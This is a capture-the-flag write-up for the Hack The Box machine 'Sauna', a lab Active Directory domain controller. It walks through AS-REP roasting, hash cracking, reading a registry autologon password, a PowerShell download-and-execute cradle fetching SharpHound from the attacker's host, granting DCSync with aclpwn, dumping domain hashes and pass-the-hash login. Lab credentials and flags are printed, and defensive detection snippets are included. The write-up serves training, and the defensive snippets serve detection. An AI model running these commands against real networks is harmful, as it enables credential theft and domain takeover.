HackTheBox WriteUp Sauna

Hack The Box Writeup: Sauna

After the JSON box was retired, a new Microsoft Windows box has been released. Under the name Sauna, this “Easy” box went live on February 15th for everyone to go wild with a good dose of DCSync power!

Hack The Box Sauna Infocard

[0x1] Reconnaissance & Enumeration

First step: the Nmap scan. The default Windows Server ports are visible, and port 80 probably serves a website based on IIS 10.0.

nmap -sV -sC -oA sauna 10.10.10.175

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 07:41 GMT


Nmap scan report for 10.10.10.175
Host is up (0.068s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 15:43:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/16%Time=5E48F264%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-16T15:45:43
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 350.43 seconds

The website of the Egotistical Bank is shown at http://10.10.10.175. The maker of this box is Egotistic, so well… that suddenly explains a lot.

There is little to find while searching for usernames. Enum4linux gives no output and other tools remain silent as well. I always like to grab the “Team” page of a website, as it often gives hints about usernames. In this case, there are indeed a few to be found.

[0x2] Initial Foothold

A bit of brute force then. I’ve listed candidate usernames in users.txt based on common naming conventions: the first name, the first name plus the first letter of the last name, and the first letter of the first name plus the last name. Let’s see if this pays off.

cat users.txt 
hugo
hugos
hsmith
fsmith
ferguss
shaun
scoins
shaunc
sophie
sdrivers
sophied
bowie
bowiet
btaylor
steven
stevenk
skerb

Using GetNPUsers.py I search the list for accounts whose AS-REP (the KDC reply that carries the Ticket Granting Ticket, TGT) can be requested without authenticating first. These are accounts with the option “Do not require Kerberos Preauthentication” enabled. I already choose to write any hashes in hashcat format so that they will be easy to crack later.

python /usr/share/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.local/ -usersfile ~/Documents/boxes/sauna/users.txt -format hashcat -outputfile ~/Documents/boxes/sauna/kerb-hashes.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

The script finishes fairly quickly and an account is indeed found whose AS-REP hash can be taken. The other accounts don’t seem to exist.
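As an added example (not the author’s code and not part of impacket), the defender-side view of the step above: a small parser for Windows Security event 4768 (“A Kerberos authentication ticket (TGT) was requested”) that flags requests issued with PreAuthType 0, which is exactly what GetNPUsers.py triggers against an account with pre-authentication disabled. The event records below are constructed for the example.

```python
"""Flag AS-REP roastable TGT requests in Windows Security event 4768 records."""
import xml.etree.ElementTree as ET

# Constructed sample records in the Windows Event XML shape (not taken from the box).
# PreAuthType 0 means the KDC issued a TGT without pre-authentication;
# TicketEncryptionType 0x17 is RC4, the etype behind $krb5asrep$23$ hashes.
SAMPLE_EVENTS = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4768</EventID></System>
  <EventData>
    <Data Name="TargetUserName">FSmith</Data>
    <Data Name="TargetDomainName">EGOTISTICAL-BANK.LOCAL</Data>
    <Data Name="ServiceName">krbtgt</Data>
    <Data Name="TicketEncryptionType">0x17</Data>
    <Data Name="PreAuthType">0</Data>
    <Data Name="IpAddress">::ffff:10.10.15.18</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4768</EventID></System>
  <EventData>
    <Data Name="TargetUserName">svc_loanmgr</Data>
    <Data Name="TargetDomainName">EGOTISTICAL-BANK.LOCAL</Data>
    <Data Name="ServiceName">krbtgt</Data>
    <Data Name="TicketEncryptionType">0x12</Data>
    <Data Name="PreAuthType">2</Data>
    <Data Name="IpAddress">::ffff:10.10.10.175</Data>
  </EventData>
</Event>
</Events>"""

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def event_data(event):
    """Turn the <Data Name=...> children of one event into a dict."""
    return {d.get("Name"): (d.text or "") for d in event.findall("e:EventData/e:Data", NS)}


def asrep_roast_candidates(xml_text):
    """Return (user, client_ip, etype) for every 4768 issued without pre-authentication."""
    hits = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4768":
            continue
        data = event_data(ev)
        if data.get("PreAuthType") != "0":
            continue
        hits.append((data["TargetUserName"], data["IpAddress"], data["TicketEncryptionType"]))
    return hits
```

A hit with etype 0x17 is the one worth paging on: the encrypted part of that AS-REP is what hashcat mode 18200 cracks offline, and the fix is simply clearing the “Do not require Kerberos preauthentication” flag on the account.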

cat ~/Documents/boxes/sauna/kerb-hashes.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde10e47a9921a82142cdeffd9ee5$[remainder of hash truncated]

The hash goes straight to Hashcat and based on the Rockyou wordlist, the password is retrieved within 40 seconds.

hashcat -m 18200 ~/Documents/boxes/sauna/kerb-hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 1024/2955 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.b9f808b5.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde10e47a9921a82142cdeffd9ee5$[remainder of hash truncated]:Thestrokes23

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde1...44312c
Time.Started.....: Sun Feb 16 09:17:01 2020 (21 secs)
Time.Estimated...: Sun Feb 16 09:17:22 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 510.1 kH/s (6.79ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Teague51

Started: Sun Feb 16 09:16:45 2020
Stopped: Sun Feb 16 09:17:23 2020

I can continue exploring Sauna knowing that the account fsmith with password Thestrokes23 is usable. There are some shares available, but the account has no rights to them. Not very interesting, so I switch to logging in via Windows Remote Management using the tool Evil-WinRM.

evil-winrm -u fsmith -p "Thestrokes23" -i 10.10.10.175

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

[0x3] Path to User flag

The connection was successful. First check whether this account holds the user flag in its Desktop folder. It looks like it does.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt     

There it is, the user flag of Sauna. That puts the first part of this box in the pocket. There isn’t really much to do from the initial foothold, since the foothold already is the User path.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf

[0x4] Path to Root flag

One of the first checks is always the C:\Users folder on a Windows Server. Here you will quickly find hints to other users on the machine. In this case, svc_loanmgr stands out.

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr 

After a lot of enumeration, I eventually arrive at the registry via a tip. The password should be stored here, and I use a search query to look through the registry for strings containing the word password. This takes a while, but eventually I get hold of the password for the service account. The account is configured to log on automatically, and therefore the password can be found in plain text under the Winlogon key.

reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword REG_SZ Moneymakestheworldgoround!

With the new account I do the same thing as with fsmith: log in with Evil-WinRM to see what’s possible with this account.

evil-winrm -u "svc_loanmgr" -p "Moneymakestheworldgoround!" -i 10.10.10.175

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

After looking around for a while I don’t find anything interesting. After the Forest box I gained some experience with BloodHound, and I use it here to see if I can find a path to DCSync permissions. I serve SharpHound from my machine so that I can download and run it on the target. I then download the output for further analysis in BloodHound.

powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.18:8000/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 2:38 PM on 2/16/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 60/s --- Using 76 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:01.9931054
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\20200216143837_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

Before I can start BloodHound, the Neo4j platform has to be running. This is only one command. If you run into pid-lock error messages, update your version of neo4j with apt-get install neo4j.

neo4j console

When neo4j has started, it is BloodHound’s turn.

bloodhound

I import the output collected on the machine under the svc_loanmgr account to see the shortest path to Domain Admin. However, this yields nothing more than needing the Administrator account. With a query that looks for DCSync permissions I get more output.

Yet it is not yet clear what is needed. Via a blog post by Dirk-jan Mollema I ended up with one of his tools, an extension of BloodHound called aclpwn. Based on the BloodHound data you determine the start and the end goal, and then use aclpwn to do a “dry” test run first and afterwards actually perform the actions needed to obtain DCSync rights. You can install aclpwn from GitHub via pip.

pip install aclpwn 

First, I do a quick check with the -dry parameter. The path is correct and there is indeed a way to obtain DCSync.

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local -dry

[+] Path found!
Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL)
[+] Path validated, the following modifications are required for exploitation in the current configuration:
[-] DCSync -> continue
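As an added example (not from the post, BloodHound or aclpwn), the defender-side counterpart of the path found above: audit the domain object’s DACL, given as an SDDL string as returned by `(Get-Acl "AD:\DC=...").Sddl`, and list trustees that hold both replication extended rights, which are the GetChanges and GetChangesAll edges BloodHound draws. The SDDL, the SIDs in it and the set of expected holders are constructed assumptions for the example.

```python
"""List non-default trustees with DCSync-capable replication rights on the domain object."""
import re

# Extended-right GUIDs that together permit replicating secrets (DCSync).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2"
REPL_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# SDDL well-known SIDs assumed to legitimately hold these rights on a default DC:
# BA = Administrators, DD = Domain Controllers, ED = Enterprise DCs, SY = SYSTEM.
EXPECTED_HOLDERS = {"BA", "DD", "ED", "SY"}

# Constructed DACL fragment; the RID-1108 SID stands in for a service account such as
# svc_loanmgr and the RID-1200 entry shows that a deny (OD) ACE is not counted.
SAMPLE_SDDL = (
    "O:DAG:DAD:"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcf2;;DD)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcf2;;DD)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcf2;;BA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcf2;;BA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcf2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcf2;;S-1-5-21-111-222-333-1108)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcf2;;S-1-5-21-111-222-333-1108)"
    "(OD;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcf2;;S-1-5-21-111-222-333-1200)"
    "(A;;RPLCLORC;;;AU)"
)

# ACE layout: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def replication_rights(sddl):
    """Map each trustee to the replication extended rights it is explicitly allowed."""
    granted = {}
    for ace_type, _flags, rights, obj_guid, _inh, sid in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA"):        # allow ACEs only; deny ACEs are skipped
            continue
        codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}  # two-letter right codes
        if not codes & {"CR", "GA"}:           # CR = control access (extended right), GA = generic all
            continue
        # An empty object GUID means the CR/GA grant covers every extended right.
        guids = REPL_RIGHTS if obj_guid == "" else {obj_guid.lower()} & REPL_RIGHTS
        if guids:
            granted.setdefault(sid, set()).update(guids)
    return granted


def dcsync_suspects(sddl):
    """Trustees outside EXPECTED_HOLDERS that hold both GetChanges and GetChangesAll."""
    return sorted(sid for sid, g in replication_rights(sddl).items()
                  if g == REPL_RIGHTS and sid not in EXPECTED_HOLDERS)
```

Any SID this returns is a principal that can pull every NT hash in the domain the way secretsdump.py does, so it belongs on the same review list as Domain Admins; the ACE can be removed with the usual ADSI or Active Directory module tooling.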

And then for real. Without the -dry parameter, aclpwn immediately submits the changes and gives svc_loanmgr the desired permissions.

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local
Please supply the password or LM:NTLM hashes of the account you are escalating from: 
[+] Path found!
Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL)
[-] DCSync -> continue
[+] Finished running tasks

Now it is only a matter of requesting a sync from the domain controller, in this case Sauna, and writing the hashes to adhashes.txt.

python /usr/share/impacket/examples/secretsdump.py egotistical-bank/svc_loanmgr@10.10.10.175 -just-dc -outputfile adhashes.txt

All local and domain accounts are neatly written out for further processing.

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a
SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198
SAUNA$:des-cbc-md5:b989ecc101ae4ca1
[*] Cleaning up...

Why make it difficult when it can also be easy? No John the Ripper or Hashcat: just use the NT hash to log in with Evil-WinRM (pass-the-hash). The root.txt is already waiting for me on the desktop.

evil-winrm -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
    Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 1/23/2020 10:22 AM 32 root.txt 

Do you even got root bro? Well, now I have 🙂 An interesting box where the methods weren’t that complicated, but a lot of time is spent on enumeration.

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
f3ee04965c68257382e31502cc5e881f


All information in this post is for educational use only! Do not use it on others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?
